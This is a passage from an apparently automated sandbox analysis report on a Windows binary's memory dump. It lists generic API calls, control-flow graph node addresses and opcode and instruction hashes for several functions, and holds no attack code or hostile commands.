                                                        • DeleteCriticalSection.KERNEL32(?), ref: 0040B517
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Delete$H_prolog$Initialize
                                                        • String ID:
                                                        • API String ID: 3452124646-0
                                                        • Opcode ID: f8fff57f146092fb693f9f0f02916facbec4d3f5cf6855c5916b59dddec30f18
                                                        • Instruction ID: 06aa0bffc57edc8446930be4fb3d3ecc4288fdccd94c57135405988f21593cb0
                                                        • Opcode Fuzzy Hash: f8fff57f146092fb693f9f0f02916facbec4d3f5cf6855c5916b59dddec30f18
                                                        • Instruction Fuzzy Hash: 5D625E7090024ADFDB14DFA4C944BDDBBB4EF14308F1480AEE815B72D2DB789A49DB99

                                                        Control-flow Graph

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 004059B8
                                                        • AreFileApisANSI.KERNEL32(?,?,00000000,00000003,?,00000000,?,00000000), ref: 004059DC
                                                          • Part of subcall function 0040597A: CreateFileA.KERNEL32(?,00000001,?,00000000,?,?,00000000,?,KA,00405A0D,?,?,?,KA,?,00000001), ref: 0040599C
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,KA,?,00000000,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: File$Create$ApisH_prolog
                                                        • String ID: KA
                                                        • API String ID: 1948390111-4133974868
                                                        • Opcode ID: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                                                        • Instruction ID: 6ceee1153368ae3910bf8b124445a1a72b78f4c7609cf7ab69cd6f34e54ac91e
                                                        • Opcode Fuzzy Hash: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                                                        • Instruction Fuzzy Hash: E0118E72A00109EFCF01AFA4D8818DE7F76EF08318F10412AF512B21A1CB398A65DF94

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 719 408524-40853c call 413954 722 408546-408579 call 40455d call 402170 719->722 723 40853e-408544 719->723 729 4085c5-4085dd call 4032a8 722->729 730 40857b-40857e 722->730 723->722 736 4085ef-4085f9 729->736 737 4085df-4085ed call 4039df 729->737 732 408582-408586 730->732 734 408590-408594 732->734 735 408588-40858a 732->735 740 408599-40859b 734->740 738 408596 735->738 739 40858c-40858e 735->739 742 4085fb-40860c call 4088ce 736->742 743 40863c-408640 736->743 753 40865e-408664 737->753 738->740 739->732 740->729 744 40859d-4085c4 call 401e19 call 401d7a call 403a9c 740->744 760 40862d-408631 call 4039df 742->760 761 40860e-40862b call 404407 742->761 745 408642-408646 743->745 746 40865c 743->746 744->729 751 408652-408657 call 4042eb 745->751 752 408648-40864d 745->752 746->753 751->746 756 408736-408755 call 4042ad call 403a9c * 2 752->756 758 408733-408735 753->758 759 40866a-40866f 753->759 787 408756-408764 756->787 758->756 766 408671-408678 call 4065b2 759->766 767 408683-4086ad call 40fd0f call 40640d 759->767 770 408636-40863a 760->770 761->770 775 40867b-40867d 766->775 781 4086b5-4086b8 767->781 782 4086af-4086b3 767->782 770->742 770->743 775->767 776 408767-408769 775->776 776->756 785 4086d0-4086ea 781->785 786 4086ba-4086c7 781->786 784 408724-40872d 782->784 784->758 784->759 791 40876b-408774 785->791 792 4086ec-408701 785->792 851 4086c8 call 40df69 786->851 852 4086c8 call 40d1ab 786->852 788 4086cb-4086ce 790 408709-40870d 788->790 795 4087a1-4087a4 790->795 796 408713-40871c 790->796 793 408776-408778 791->793 794 40877c-40879f call 4042ad call 403a9c * 2 791->794 792->790 802 408703-408705 792->802 793->794 794->787 799 4087a6-4087af 795->799 800 4087bf-4087de 795->800 796->784 797 40871e-408720 796->797 797->784 804 4087b1-4087b3 799->804 805 4087b7-4087ba 799->805 808 4087e0-4087e8 800->808 809 4087f8-40881b call 405e34 call 40640d 800->809 802->790 804->805 805->756 811 4087ea 808->811 812 4087ef-4087f3 call 401d1b 808->812 820 408879-408886 call 4088ce 809->820 821 40881d-408877 call 401c80 * 2 call 407d82 call 401d7a call 403a9c * 3 809->821 811->812 812->809 826 408888 820->826 827 40888a-4088b5 call 407d82 call 401d7a call 403a9c 820->827 841 4088b6-4088bf 821->841 826->827 827->841 843 4088c1-4088c3 841->843 844 4088c7-4088c9 841->844 843->844 844->756 851->788 852->788
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID: 83B$Unknown error
                                                        • API String ID: 3519838083-1944086607
                                                        • Opcode ID: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                                                        • Instruction ID: d43b38567734cbd3d280cef04a8de17ccbe463ec1fdb7709e9180388f705ec22
                                                        • Opcode Fuzzy Hash: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                                                        • Instruction Fuzzy Hash: A5D17070900259EFCF05DFA4C944ADEBB74BF14318F20846EF845BB291CB78AA45CB95

                                                        Control-flow Graph

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00408F0F
                                                        • GetLastError.KERNEL32(?,00000003,00000003,00000003,?,?,00000000), ref: 00408FD3
                                                          • Part of subcall function 00409184: __EH_prolog.LIBCMT ref: 00409189
                                                          • Part of subcall function 004092E9: __EH_prolog.LIBCMT ref: 004092EE
                                                          • Part of subcall function 00408A3B: __EH_prolog.LIBCMT ref: 00408A40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$ErrorLast
                                                        • String ID: KA
                                                        • API String ID: 2901101390-4133974868
                                                        • Opcode ID: beb16fee00325bc56f229413d9b8be2c1c8ba29f30ceeac5e824749cff746bef
                                                        • Instruction ID: 1ffdda1e280707f1620b0bff2a1c5a648dc862d45b7bd7d33f28712355ced64d
                                                        • Opcode Fuzzy Hash: beb16fee00325bc56f229413d9b8be2c1c8ba29f30ceeac5e824749cff746bef
                                                        • Instruction Fuzzy Hash: 7C81677190020AABCF01EFA5C885ADEBBB5BF18318F14416EF455B32A2CB399A05CB54

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 936 4049dd-404a02 call 413954 call 401c80 941 404a04-404a07 936->941 942 404a4a-404a59 call 401ce1 936->942 944 404a0b-404a0e 941->944 948 404a5d-404a67 call 40499c 942->948 946 404a10-404a12 944->946 947 404a18-404a1c 944->947 949 404a14-404a16 946->949 950 404a1e 946->950 951 404a21-404a23 947->951 956 404b42-404b49 call 401d7a 948->956 957 404a6d-404a78 GetLastError 948->957 949->944 950->951 951->942 953 404a25-404a2a 951->953 953->942 955 404a2c-404a2f 953->955 958 404a31-404a36 955->958 959 404a3f-404a45 call 4023ee 955->959 969 404b4e-404b51 956->969 961 404aea-404afc call 402ee1 call 405841 957->961 962 404a7a-404a7f 957->962 958->959 964 404a38-404a3a 958->964 959->942 988 404b01-404b03 961->988 966 404bb2 962->966 967 404a85-404a88 962->967 965 404bc0-404bc6 call 403a9c 964->965 985 404bc7-404bd7 965->985 973 404bb4-404bbf call 403a9c 966->973 971 404a8c-404a8f 967->971 974 404b57-404b5a 969->974 975 404bd8-404bda 969->975 979 404a91-404a93 971->979 980 404a99-404a9f 971->980 973->965 977 404b5e-404b64 974->977 975->973 983 404b66-404b69 977->983 984 404b6f-404b75 977->984 986 404aa1 979->986 987 404a95-404a97 979->987 989 404aa4-404aa6 980->989 991 404b77 983->991 992 404b6b-404b6d 983->992 993 404b7a-404b7c 984->993 986->989 987->971 994 404b05-404b07 988->994 995 404b09-404b11 988->995 989->966 990 404aac 989->990 990->966 999 404ab2-404ab8 990->999 991->993 992->977 1000 404b81-404bb0 call 401e3a call 40499c call 403a9c 993->1000 1001 404b7e 993->1001 996 404b15-404b30 call 403a9c * 3 994->996 997 404b13 995->997 998 404b35-404b41 call 403a9c 995->998 996->985 997->996 998->956 999->966 1003 404abe-404ae5 call 401e3a call 401d7a call 403a9c 999->1003 1000->966 1000->969 1001->1000 1003->948
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 004049E2
                                                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00404A6D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: ErrorH_prologLast
                                                        • String ID: KA
                                                        • API String ID: 1057991267-4133974868
                                                        • Opcode ID: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                                                        • Instruction ID: ea88e0dbf276ed2b61ac96949af9a946984d9cda694903235269fb2a0f105987
                                                        • Opcode Fuzzy Hash: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                                                        • Instruction Fuzzy Hash: 14512671A4010A9ACF10EBA0C945AFFBB74EF91318F14017BE601732D1D779AE46CB99

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1023 401af4-401b2e call 413954 call 413cc0 call 405b6d 1030 401b30-401b3e call 405975 1023->1030 1031 401b43-401b49 1023->1031 1039 401c6b-401c78 1030->1039 1033 401b57-401b60 1031->1033 1034 401b4b-401b55 1031->1034 1036 401b62-401b6c 1033->1036 1037 401b6e-401b7b 1033->1037 1034->1033 1034->1034 1036->1036 1036->1037 1038 401b7f-401b96 call 405bca 1037->1038 1041 401b9b-401b9d 1038->1041 1042 401ba3-401ba8 1041->1042 1043 401c5a 1041->1043 1044 401c56-401c58 1042->1044 1045 401bae-401bb0 1042->1045 1046 401c5c-401c6a call 405975 1043->1046 1044->1046 1047 401bb6-401bbc 1045->1047 1046->1039 1049 401bf0-401bf5 1047->1049 1050 401bbe-401bc3 1047->1050 1052 401c16-401c3b call 413980 1049->1052 1053 401bf7-401c08 call 4134d0 1049->1053 1050->1052 1054 401bc5-401bd6 call 4134d0 1050->1054 1063 401c4a-401c54 1052->1063 1064 401c3d-401c44 1052->1064 1061 401c0a-401c14 1053->1061 1062 401bec-401bee 1053->1062 1054->1044 1065 401bd8-401bdf 1054->1065 1061->1047 1062->1047 1063->1046 1064->1063 1066 401b7d 1064->1066 1065->1043 1067 401be1-401be7 call 401ee5 1065->1067 1066->1038 1067->1062
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID: KA$KA
                                                        • API String ID: 3519838083-594506476
                                                        • Opcode ID: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                                                        • Instruction ID: 3866b3b7da3d7396f9922ec017f7e66c93d936b9f161a27d318f0a0663603341
                                                        • Opcode Fuzzy Hash: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                                                        • Instruction Fuzzy Hash: 7451CF72D042199FDF11DFA4C940BEEBBB4AF05394F14416AE851732E2E3789E85CB68

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1069 407093-4070c7 call 413954 EnterCriticalSection call 4065b2 1073 4070c9-4070d7 call 406505 1069->1073 1074 4070da-4070f2 LeaveCriticalSection 1069->1074 1073->1074
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00407098
                                                        • EnterCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070A9
                                                        • LeaveCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070DD
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterH_prologLeave
                                                        • String ID:
                                                        • API String ID: 367238759-0
                                                        • Opcode ID: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                                                        • Instruction ID: a56bdc6fde0de93627b634a906b5586fd045a2fb55df8f4462ae58feb39c4b8d
                                                        • Opcode Fuzzy Hash: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                                                        • Instruction Fuzzy Hash: D7018176A00204EFCB118F94CC08B9ABBB5FF48715F00841AFD12E7250C3B4A910CFA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1077 40dd8b-40ddb0 call 413954 call 40776f 1082 40ddb6-40ddbf call 40df2c 1077->1082 1083 40df1b-40df29 1077->1083 1086 40ddc1-40ddc3 1082->1086 1087 40ddc8-40ddfe call 4076d5 call 414090 1082->1087 1086->1083 1092 40de01-40de06 1087->1092 1093 40de25-40de47 call 406505 1092->1093 1094 40de08-40de15 1092->1094 1100 40df07 1093->1100 1101 40de4d-40de55 1093->1101 1095 40decb-40dece 1094->1095 1096 40de1b 1094->1096 1098 40df09-40df19 call 403a9c 1095->1098 1096->1093 1099 40de1d-40de1f 1096->1099 1098->1083 1099->1093 1099->1095 1100->1098 1101->1095 1103 40de57-40de5b 1101->1103 1103->1093 1105 40de5d-40de6d 1103->1105 1106 40dec6-40dec9 1105->1106 1107 40de6f 1105->1107 1108 40deaa-40dec1 call 413980 1106->1108 1109 40de77 1107->1109 1108->1092 1111 40de7a-40de7e 1109->1111 1113 40de80-40de82 1111->1113 1114 40de8a 1111->1114 1115 40de84-40de88 1113->1115 1116 40de8c 1113->1116 1114->1116 1115->1111 1116->1108 1117 40de8e-40de97 call 40df2c 1116->1117 1120 40ded0-40df04 call 414090 call 4065b2 1117->1120 1121 40de99-40dea2 1117->1121 1120->1100 1122 40de71-40de74 1121->1122 1123 40dea4-40dea7 1121->1123 1122->1109 1123->1108
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-3916222277
                                                        • Opcode ID: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                                                        • Instruction ID: cf89379ab294d4739916b9706e3dd1d7b183837ff3903d8a06049ba810aa014c
                                                        • Opcode Fuzzy Hash: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                                                        • Instruction Fuzzy Hash: 19515E71E006069BDB14DFA9C881ABFB7B5EF98304F14853AE405BB381D778A9458BA4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1128 403113-40313f call 413954 call 402ee1 call 405841 1135 403141-403156 call 401d1b 1128->1135 1136 403158-40315d 1128->1136 1142 4031b9-4031c1 call 403a9c 1135->1142 1138 403167 1136->1138 1139 40315f-403165 1136->1139 1141 40316a-4031a9 call 4032a8 call 408f0a call 4042ad 1138->1141 1139->1141 1153 4031c6-4031e8 call 401ce1 call 405d0b call 4049dd 1141->1153 1154 4031ab-4031b4 call 401d1b 1141->1154 1148 403298 1142->1148 1150 403299-4032a7 1148->1150 1162 40322a-40327f call 401c80 call 402685 call 403a9c 1153->1162 1163 4031ea-403228 call 409569 call 401d7a call 403a9c * 3 1153->1163 1154->1142 1185 403281 call 40c231 1162->1185 1186 403281 call 40bbc9 1162->1186 1163->1150 1178 403284-403297 call 403a9c * 2 1178->1148 1185->1178 1186->1178
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00403118
                                                          • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                                          • Part of subcall function 004049DD: __EH_prolog.LIBCMT ref: 004049E2
                                                          • Part of subcall function 00409569: __EH_prolog.LIBCMT ref: 0040956E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID: Default
                                                        • API String ID: 3519838083-753088835
                                                        • Opcode ID: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                                                        • Instruction ID: 6c236086827897a16f525891fa60e3e62c5941a793998487ad20a929e2e28791
                                                        • Opcode Fuzzy Hash: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                                                        • Instruction Fuzzy Hash: 76516071900609EFCB10EFA5D8859EEBBB8FF08318F00456FE45277291DB38AA05CB14

                                                        Control-flow Graph

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00402F1A
                                                          • Part of subcall function 00403376: __EH_prolog.LIBCMT ref: 0040337B
                                                          • Part of subcall function 004034E3: __EH_prolog.LIBCMT ref: 004034E8
                                                          • Part of subcall function 0040309D: __EH_prolog.LIBCMT ref: 004030A2
                                                          • Part of subcall function 0040309D: ShowWindow.USER32(00414BE4,00000001,000001F4,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030FB
                                                          • Part of subcall function 004131E0: CloseHandle.KERNEL32(00000000,00000000,00403035,?,?,00000000,00000003,?,00000000,?,?,00000000,00000000,00000000), ref: 004131EA
                                                          • Part of subcall function 004131E0: GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 004131F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$CloseErrorHandleLastShowWindow
                                                        • String ID: KA
                                                        • API String ID: 2740091781-4133974868
                                                        • Opcode ID: bb7fe99dab057578dfc5081c7807b9d545d10ddf8b2be0d385789b3d7fcb172b
                                                        • Instruction ID: b66072ba2aa71961cefff889ac2f3310996ab01b533407b8592e0c78779ee57e
                                                        • Opcode Fuzzy Hash: bb7fe99dab057578dfc5081c7807b9d545d10ddf8b2be0d385789b3d7fcb172b
                                                        • Instruction Fuzzy Hash: 2F41AF31900249DBCB11EFA5C991AEDBBB8AF14314F1480BFE906B72D2DB385B45CB55

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1237 408902-408925 call 413954 1240 408927-408931 call 403a76 1237->1240 1241 40894b-40894e 1237->1241 1248 408933-40893c 1240->1248 1249 40893e 1240->1249 1242 408950-40895a call 403a76 1241->1242 1243 4089a2-4089b3 call 408524 1241->1243 1255 40897b 1242->1255 1256 40895c-408979 1242->1256 1250 4089b8-4089c2 1243->1250 1252 408940-408949 call 40640d 1248->1252 1249->1252 1253 4089c4-4089c6 1250->1253 1254 4089ca-4089d3 1250->1254 1252->1243 1253->1254 1258 4089d5-4089d7 1254->1258 1259 4089db-4089eb 1254->1259 1260 40897d-408992 call 40640d call 406434 1255->1260 1256->1260 1258->1259 1266 408994-40899a GetLastError 1260->1266 1267 40899c-40899f 1260->1267 1266->1250 1267->1243
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00408907
                                                        • GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00408AEB,?,?,?,?,?,?,?,00000000), ref: 00408994
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: ErrorH_prologLast
                                                        • String ID:
                                                        • API String ID: 1057991267-0
                                                        • Opcode ID: 1d510f232b79bdb8f7fb6071bbe81c0229833e2825a4e5c7126d04dc9213e4f2
                                                        • Instruction ID: a8fc1237ba57e47b0ed65f04e9c7bd5e3c99de29461016f9efabf40ab0132a5b
                                                        • Opcode Fuzzy Hash: 1d510f232b79bdb8f7fb6071bbe81c0229833e2825a4e5c7126d04dc9213e4f2
                                                        • Instruction Fuzzy Hash: 3F3181B19012499FCB10DF95CA859BEBBA0FF04314B14817FE495B72A1CB388D41CB6A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
